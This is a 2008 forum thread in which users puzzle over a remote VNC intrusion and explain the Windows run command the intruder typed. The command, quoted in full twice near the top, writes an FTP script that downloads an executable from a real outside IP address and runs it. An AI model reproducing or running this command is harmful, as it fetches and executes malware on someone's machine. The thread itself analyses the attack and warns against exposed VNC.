As was foretold, we've added advertisements to the forums! If you have questions, or if you encounter any bugs, please visit this thread: https://forums.penny-arcade.com/discussion/240191/forum-advertisement-faq-and-reports-thread/

The Strangest Thing (hack, cmd knowledge requested)

UncleSporkyUncleSporky Registered User regular
TLDR: A friend gets remote controlled and strange text is entered into his run command.

My friend and coworker borrowed a laptop from work to use over this weekend. It has VNC (PC remote control software) on it that we use occasionally to make life easier.

He called me up from home just before I left work. Seems he was using the laptop, minding his own business, when all of a sudden the VNC icon goes dark (you are being controlled!) and his mouse starts moving.

He and I both thought it might be another friend from work pranking him...but he shouldn't have an easily tracked IP address when using it at home, right? Plus VNC was supposedly password protected on that machine.

This anonymous person opens a run command and types in the following:
cmd /c echo open 87.230.22.187/httpdocs/img/ 21 >> ik &echo user zf [email protected] >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exit

Nothing obvious happens as a result of this. The VNC icon turns white again, my friend regains control and writes all this down and emails it to me.

I googled some of this info and - here is a weird thing - there is exactly one google result. From just today.
Ok, so I am minding my own business and the browser freezes (mind you, was on Google.com), and spotlight gets the following entered into it:

echo open 87.230.22.187/https/img/ 21 >> ik &echo user zf [email protected] >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exitecho You got owned

So, I know this is someone's lame attempt at a hack, but what gets me is how it has come into the system.

I have the normal firewall rules on and no unusual processes running. I was running through my WPA2 protected WIFI connection, but have jumped to hard wired for now and disabled the network for now.

I have not downloaded any questionable content from anywhere and stay updated. I went as far as to go in and install anti-virus on the Mac (even though some may consider it a moot point). Negative on the results. Of course, this sounds like a windows virus. No other windows systems were connected to the network at the time of this 'hack'.

Any ideas? Google returns ZERO results.

I'm really curious at this point. My work computer has Deep Freeze on it, which means any changes made to the computer at all are not remembered after a reboot - meaning I am pretty much safe from viruses and such. So I boldly type in the IP address into a browser to see what happens.

The site comes up Forbidden, denied access...but it wants to install an activex control, something about "Microsoft Remote Data," and a strange vcard dialog pops up. And after a few seconds, maybe I'm misinterpreting the significance of this, but a photoshop document I had minimized suddenly came to the front.

So I held in the power button and came home.

I really want to know what that command is supposed to do! Based on almost no knowledge at all, I am guessing that it's trying to pull com.exe off of some server and run it, and the second bit is authentication? I like how the Mac guy's version ends with "you got owned."

I'm going to go out on a limb here and say for the love of god don't type this in unless you really know what you're doing.

EDIT: Output from several lookup websites for that IP; apparently it's German.
Host name: lvps87-230-22-187.dedicated.hosteurope.de.
IP address: 87.230.22.187
Location: Berlin, GERMANY
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL

ReferralServer: whois://whois.ripe.net:43

NetRange: 87.0.0.0 - 87.255.255.255
CIDR: 87.0.0.0/8
NetName: 87-RIPE
NetHandle: NET-87-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2004-04-01
Updated: 2004-04-06

# ARIN WHOIS database, last updated 2008-11-25 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '87.230.22.0 - 87.230.22.255'
inetnum: 87.230.22.0 - 87.230.22.255
remarks: INFRA-AW
netname: HE-DS-22-CGN2-NET
descr: Hosteurope GmbH
descr: [email protected]
country: DE
admin-c: HER4-RIPE
tech-c: HER
status: ASSIGNED PA
mnt-by: ONE2ONE-MNT
source: RIPE # Filtered
role: Host Europe Ripehandle
address: Hansestr. 109
address: 51149 Koeln
phone: +49 2203 1045 0
abuse-mailbox: [email protected]
admin-c: DART
admin-c: FLX
admin-c: WIRR
admin-c: SHAF
admin-c: HONK
tech-c: DART
tech-c: FLX
tech-c: WIRR
tech-c: SHAF
tech-c: HONK
nic-hdl: HER
mnt-by: ONE2ONE-MNT
source: RIPE # Filtered
person: Uwe Braun
address: Hansestr. 109
address: 51149 Koeln
phone: +49 2203 1045 7000
nic-hdl: HER4-RIPE
source: RIPE # Filtered
mnt-by: ONE2ONE-MNT
% Information related to '87.230.0.0/17AS20773'
route: 87.230.0.0/17
descr: DE-HER-87-230-SLASH-17
origin: AS20773
member-of: AS20773:RS-HOSTEUROPE
mnt-by: ONE2ONE-MNT
source: RIPE # Filtered

Switch Friend Code: SW - 5443 - 2358 - 9118 || 3DS Friend Code: 0989 - 1731 - 9504 || NNID: unclesporky
UncleSporky on

Posts

  • Epyon9283Epyon9283 Registered User
    edited November 2008
    It looks like its trying to connect to an FTP server. It has to log in to download the com.exe file.

    As a general rule of thumb you should never keep VNC open to the world. Even if it's password protected. If your password is simplistic they could have brute forced it. If the version of VNC is older it could have been exploited. Even if you use a complex password and an up to date version of VNC, straight (normal) VNC is unencrypted so your password is sent in the clear.

    Epyon9283 on
  • UncleSporkyUncleSporky Registered User regular
    edited November 2008
    Epyon9283 wrote: »
    It looks like its trying to connect to an FTP server. It has to log in to download the com.exe file.

    As a general rule of thumb you should never keep VNC open to the world. Even if it's password protected. If your password is simplistic they could have brute forced it. If the version of VNC is older it could have been exploited. Even if you use a complex password and an up to date version of VNC, straight (normal) VNC is unencrypted so your password is sent in the clear.

    Of course. That wasn't really my concern, we can easily redo that laptop and disable VNC when people go on the road. It's strange though how the same thing happened on a Mac.

    UncleSporky on
    Switch Friend Code: SW - 5443 - 2358 - 9118 || 3DS Friend Code: 0989 - 1731 - 9504 || NNID: unclesporky
  • UselesswarriorUselesswarrior Registered User regular
    edited November 2008
    No, it isn't that strange. Ports and firewalls work exactly the same wither it is Mac, Windows, Solaris, OpenBSD etc. Essentially you have a service exposed to the outside world and some chinese script kidding's bot is try to get in.

    So what most likely happened is your friend took the laptop onto a network that was exposed to the outside world, same thing most likely happened to the mac kid. VNC is dangerous and if your running it the firewall on the local machine should only expose it to local (same subnet) machines, AND then the router should be set up with proper firewall rules.

    I used to intern at a research lab were we ran our own servers. The second you expose a machine to the internet, bots start to hit it to see if they can get in. We had an FTP server, and the amount of failed login attempts was staggering.

    Uselesswarrior on
    Hey I made a game, check it out @ http://ifallingrobot.com/. (Or don't, your call)
  • PeregrineFalconPeregrineFalcon Registered User regular
    edited November 2008
    TL;DR your friend got owned by a script kiddie, who downloaded a trojan from a remote FTP server.

    Deploy an orbital nuke on that fucker.

    PeregrineFalcon on
    Looking for a DX:HR OnLive code for my kid brother.
    Can trade TF2 items or whatever else you're interested in. PM me.
  • midgetspymidgetspy Registered User
    edited November 2008
    All that command line does is:

    1) creates a file named "ik" containing the necessary commands to log into an FTP server and download a trojan
    2) uses the "ik" file to log in and download the trojan
    3) deletes the "ik" file
    4) runs the trojan

    midgetspy on
  • AzioAzio Registered User regular
    edited November 2008
    Yeah, I don't think any damage was done. You should call those hosteurope people and inform them of the attempt.

    Azio on
Sign In or Register to comment.